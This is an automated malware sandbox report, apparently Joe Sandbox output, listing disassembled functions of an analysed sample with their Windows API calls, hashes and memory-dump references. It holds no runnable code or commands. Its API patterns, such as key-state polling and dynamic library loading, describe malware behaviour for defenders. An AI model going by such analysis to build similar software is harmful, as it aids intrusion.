Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: c3b10e7dee9337bc92293377ca8d9ce277a6c8763f2f50a84f80c8048b1ea218
Instruction ID: fbefbfb3d9e6aba3837dbe6dab9683e3cea068a3a6d3081fb9e18bd8cbd7ea81
Opcode Fuzzy Hash: c3b10e7dee9337bc92293377ca8d9ce277a6c8763f2f50a84f80c8048b1ea218
Instruction Fuzzy Hash: 1D61CF71218205AFC315EF24C494F2ABBE5FF84348F14856CF8998B2A2DB31ED45CB92

Function 00258BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00258BCD
VariantClear.OLEAUT32 ref: 00258C3E
VariantClear.OLEAUT32 ref: 00258C9D
VariantClear.OLEAUT32(?), ref: 00258D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00258D3B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: b403b7a12bcc940838957c084a21da0f7a2c2a93d13fb006accd33a912138cce
Instruction ID: 1cfecd3da4807cb1f85eee7fd0b90241b9f800c75519828dbacd60c1c05632e0
Opcode Fuzzy Hash: b403b7a12bcc940838957c084a21da0f7a2c2a93d13fb006accd33a912138cce
Instruction Fuzzy Hash: 2C518BB5A11219EFCB14CF28D884AAAB7F8FF89311B118559ED05EB350E770E911CFA4

Function 00268AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00268BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00268BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00268C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00268C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00268C5F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 610a640cbacc7d2429ba96cfebb19fcac1ce3de293a2457fb30776997107ca21
Instruction ID: 6afa66179701151601847f66318211597333c9c5a29030eb1e44baede9e78527
Opcode Fuzzy Hash: 610a640cbacc7d2429ba96cfebb19fcac1ce3de293a2457fb30776997107ca21
Instruction Fuzzy Hash: 28515A35A002199FCB14DF64C880E6DBBF5FF48314F088059E949AB3A2CB31ED55CBA0

Function 00278EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00278F40
GetProcAddress.KERNEL32(00000000,?), ref: 00278FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00278FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00279032
FreeLibrary.KERNEL32(00000000), ref: 00279052

Part of subcall function 0020F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00261043,?,76D1E610), ref: 0020F6E6
Part of subcall function 0020F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0024FA64,00000000,00000000,?,?,00261043,?,76D1E610,?,0024FA64), ref: 0020F70D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 6cf68d24de8308d4df280fe23577ba3d5607a7db6dafda7da404cd632520944f
Instruction ID: bee5e55c9013b2e6701dcd881a5f704ca8dec311cb9d2249537838d39facc33a
Opcode Fuzzy Hash: 6cf68d24de8308d4df280fe23577ba3d5607a7db6dafda7da404cd632520944f
Instruction Fuzzy Hash: 67516934615209DFCB10EF58C4988ADBBF1FF59314B14C0A8E90A9B762DB31ED85CB91

Function 00286B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00286C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00286C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00286C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0026AB79,00000000,00000000), ref: 00286C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00286CC7

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: f95c4a5eb04e3ceb968f3f89e9c04d217bb332492cfe63f1368917f54d4edb42
Instruction ID: 424faa1891f94074f587237fdf13a6ebc4a7be86abc94773c882d8c3459b1c3e
Opcode Fuzzy Hash: f95c4a5eb04e3ceb968f3f89e9c04d217bb332492cfe63f1368917f54d4edb42
Instruction Fuzzy Hash: D641D33D622105AFDB24EF28CC5DFA97BA5EB09360F140229F895A72E0C371ED60CB50

Function 00222051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002220C3
_free.LIBCMT ref: 002220E3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b96c75fd2f16d3c6ec4e6cd6332bbf51db19a7c68fa063cec2833bb68f00a705
Instruction ID: 52e156b31f2c120b0b543ffc73a4b09adec095491e0d5bc78956be676af8488a
Opcode Fuzzy Hash: b96c75fd2f16d3c6ec4e6cd6332bbf51db19a7c68fa063cec2833bb68f00a705
Instruction Fuzzy Hash: 4E41E632A10210FFCB24DFB8D880A5DB3E5EF88314F154568E515EB392DB32AE25CB81

Function 0020912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00209141
ScreenToClient.USER32(00000000,?), ref: 0020915E
GetAsyncKeyState.USER32(00000001), ref: 00209183
GetAsyncKeyState.USER32(00000002), ref: 0020919D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: a588d3e357a9e4a01ccfd9c1c476d561de3b4406eb0b0e545bd6006ea321a475
Instruction ID: 937e25c36176b8bc834a5bbfd3d7a46494e49ae71822b2e8c1998c77a124a91a
Opcode Fuzzy Hash: a588d3e357a9e4a01ccfd9c1c476d561de3b4406eb0b0e545bd6006ea321a475
Instruction Fuzzy Hash: 7D416D75A1860BEBDF099F64C848BEEF774FB05320F204215E42EA62D1C77459A4CF91

Function 00263874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002638CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00263922
TranslateMessage.USER32(?), ref: 0026394B
DispatchMessageW.USER32(?), ref: 00263955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00263966

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: a6211a5b8cab33ba2c8b635c3106fbc4915f85650b61c728d0f45ceae507003f
Instruction ID: 52091ee6fe8d10c171a132b1a60d7e689cf4cb057eb7eaf3b5589510ff46bc1b
Opcode Fuzzy Hash: a6211a5b8cab33ba2c8b635c3106fbc4915f85650b61c728d0f45ceae507003f
Instruction Fuzzy Hash: 5C318670525343DEEB25CF34A84DFB637A8EB06304F540559D45293191D7F496E5CF21

Function 0026CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0026C21E,00000000), ref: 0026CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0026CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0026C21E,00000000), ref: 0026CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0026C21E,00000000), ref: 0026CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0026C21E,00000000), ref: 0026CFF2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: a841f662ec3fbfafd4ed9db9d5c90b16a0b5d3892c9545b9a44993e908412648
Instruction ID: b487585303d4c48254cd6e2bfee354cc16a4175518f527a30b6be0ae88bb87d6
Opcode Fuzzy Hash: a841f662ec3fbfafd4ed9db9d5c90b16a0b5d3892c9545b9a44993e908412648
Instruction Fuzzy Hash: B4318071520306EFDB20EFA5D8889BBBBF9EB14310B20442FF556D2551D730AD90DB60

Function 00251901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00251915
PostMessageW.USER32(00000001,00000201,00000001), ref: 002519C1
Sleep.KERNEL32(00000000,?,?,?), ref: 002519C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 002519DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 002519E2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 02b4b4d3329cf62bf8d1c736b6aab5f4dad51577a5566174e244ce2eb785ffce
Instruction ID: e5bfa2155120fe9250ca3614442794c0c164b868c5a8f0f062dddfe278a1d9ca
Opcode Fuzzy Hash: 02b4b4d3329cf62bf8d1c736b6aab5f4dad51577a5566174e244ce2eb785ffce
Instruction Fuzzy Hash: 6231AF75910219EFCB04CFA8D99DBDE7BB5EB44316F104229FD21A72D1C7B09968CB90

Function 00285706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00285745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0028579D
_wcslen.LIBCMT ref: 002857AF
_wcslen.LIBCMT ref: 002857BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00285816

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 9983bd04d51a781a5cdb76dbacf2bb74443a2c201098b5c7a4a0b383f4a4d61b
Instruction ID: 37ee96fd5f9da485b52b8d9645fdda959579b69349609031fa90dc30e66422a9
Opcode Fuzzy Hash: 9983bd04d51a781a5cdb76dbacf2bb74443a2c201098b5c7a4a0b383f4a4d61b
Instruction Fuzzy Hash: 5321A739925629DADB20AF60DC45AEDB7BCFF44321F108216F919DA1D0D77089A5CF50

Function 00270930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00270951
GetForegroundWindow.USER32 ref: 00270968
GetDC.USER32(00000000), ref: 002709A4
GetPixel.GDI32(00000000,?,00000003), ref: 002709B0
ReleaseDC.USER32(00000000,00000003), ref: 002709E8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: b838429a44a8ed68d72b259b3dda7e00bb176a6add60221eefa239fdf4ff0609
Instruction ID: 3a1058693c4b0b69cbd237382d2227f1676a5cb3e8dd33f164d3d9902c191b96
Opcode Fuzzy Hash: b838429a44a8ed68d72b259b3dda7e00bb176a6add60221eefa239fdf4ff0609
Instruction Fuzzy Hash: 03218479600214EFD704EF65D988A6EBBE9EF44700F148068E94A97361DB70AC44CB50

Function 0022CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0022CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0022CDE9

Part of subcall function 00223820: RtlAllocateHeap.NTDLL(00000000,?,002C1444,?,0020FDF5,?,?,001FA976,00000010,002C1440,001F13FC,?,001F13C6,?,001F1129), ref: 00223852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0022CE0F
_free.LIBCMT ref: 0022CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0022CE31

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 16a72b32909bb770d039c4554e4d6c0ff66f3593b76fb951a460f3ff8c4bbce5
Instruction ID: beb2badb5e96ac69b709d3c7f91967730d92b22eb9df88cc99c59924cb88e0cf
Opcode Fuzzy Hash: 16a72b32909bb770d039c4554e4d6c0ff66f3593b76fb951a460f3ff8c4bbce5
Instruction Fuzzy Hash: 2301D8766222357F23211AF67C8CC7F696DDEC6BA13360129F905C7204DBB18D2282B1

Function 00209639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00209693
SelectObject.GDI32(?,00000000), ref: 002096A2
BeginPath.GDI32(?), ref: 002096B9
SelectObject.GDI32(?,00000000), ref: 002096E2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2b42977a2d9dc76476ca294b9faf7eb3fc5a94b5bdc2c0d6c002819cf7783dc7
Instruction ID: 9e2f97fe9f694318abbccd4e1cb675a39d25dc20170d2b01acb78620767cd40e
Opcode Fuzzy Hash: 2b42977a2d9dc76476ca294b9faf7eb3fc5a94b5bdc2c0d6c002819cf7783dc7
Instruction Fuzzy Hash: 7D216D70822346EBDB119F24FC0EBA93BA8BB41755F200216F416A61E3D37198B1CFA0

Function 00255711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00255726
_memcmp.LIBVCRUNTIME ref: 00255744
_memcmp.LIBVCRUNTIME ref: 00255757
_memcmp.LIBVCRUNTIME ref: 0025576F
_memcmp.LIBVCRUNTIME ref: 00255787

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 0de71e9802af105b23360b63fe95a3d6b1c0218489a892f7bb37c65606db311b
Instruction ID: 035dc5be6aee4d4d4f0d49ec776b7b01c6b2940493ec15f11552aa391319955e
Opcode Fuzzy Hash: 0de71e9802af105b23360b63fe95a3d6b1c0218489a892f7bb37c65606db311b
Instruction Fuzzy Hash: BC01F9652B1619BBD208A9119E52FFBB39C9B39396F104021FE049A285F770EE7487A4

Function 00222DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0021F2DE,00223863,002C1444,?,0020FDF5,?,?,001FA976,00000010,002C1440,001F13FC,?,001F13C6), ref: 00222DFD
_free.LIBCMT ref: 00222E32
_free.LIBCMT ref: 00222E59
SetLastError.KERNEL32(00000000,001F1129), ref: 00222E66
SetLastError.KERNEL32(00000000,001F1129), ref: 00222E6F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2c6cca694845245ae44e45b37a9610a826209359febe012a63c228e3ef8217ad
Instruction ID: 14da1b9eb015264110e45117ff7a93045292972c147cdb04f07e6c745a83afe5
Opcode Fuzzy Hash: 2c6cca694845245ae44e45b37a9610a826209359febe012a63c228e3ef8217ad
Instruction Fuzzy Hash: AC014936231631F7C6126BF43C4AD3B265DABC53617320128F815A22D3EB76DC396520

Function 0025000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0024FF41,80070057,?,?,?,0025035E), ref: 0025002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0024FF41,80070057,?,?), ref: 00250046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0024FF41,80070057,?,?), ref: 00250054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0024FF41,80070057,?), ref: 00250064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0024FF41,80070057,?,?), ref: 00250070

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 1263d5cb2964f4e6182f68387bb5d549a23088c9177bcde310e404329b8767b9
Instruction ID: 089b56c8a0557aeba162b5c6d5f072b08ef8e1332cd75c5f9f0f14cb5b984f6c
Opcode Fuzzy Hash: 1263d5cb2964f4e6182f68387bb5d549a23088c9177bcde310e404329b8767b9
Instruction Fuzzy Hash: B501F276611215BFDB114F68EC88BAA7AEDEF44352F244024FC01D2250D770ED048BA0

Function 0025E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0025E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0025E9A5
Sleep.KERNEL32(00000000), ref: 0025E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0025E9B7
Sleep.KERNEL32 ref: 0025E9F3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
